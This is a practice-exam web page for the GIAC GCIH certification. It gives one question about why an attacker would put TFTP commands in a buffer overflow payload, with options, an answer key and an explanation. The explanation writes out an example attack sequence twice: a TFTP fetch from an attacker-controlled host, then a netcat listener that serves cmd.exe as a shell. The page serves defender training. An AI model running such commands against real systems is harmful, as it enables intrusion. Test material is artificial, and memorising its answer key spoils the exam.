GIAC
GCIH · Question #615
GCIH Question #615: Real Exam Question with Answer & Explanation
The correct answer is B: To retrieve a malicious executable from the attacker's system. If an attacker discovers a buffer overflow that he or she can trigger remotely, the attacker could overflow the buffer and have it execute the following commands: TFTP Remote_IPaddress (another machine the attacker controls) nc -l -p 8080 (or any other port I can get to) -e cmd.e
Vulnerability Exploitation & Privilege Escalation
Question
What purpose would an attacker have for including TFTP commands in the payload of a buffer overflow exploit?
Options
- ATo run a brute force attack against the victim's administrator password
- BTo retrieve a malicious executable from the attacker's system
- CTo launch a port scan against the victim's internal network
- DTo disable the victim's anti-virus and security software
Explanation
If an attacker discovers a buffer overflow that he or she can trigger remotely, the attacker could overflow the buffer and have it execute the following commands: TFTP Remote_IPaddress (another machine the attacker controls) nc -l -p 8080 (or any other port I can get to) -e cmd.exe
Topics
#TFTP#buffer overflow payload#malware download#exploit staging
Community Discussion
No community discussion yet for this question.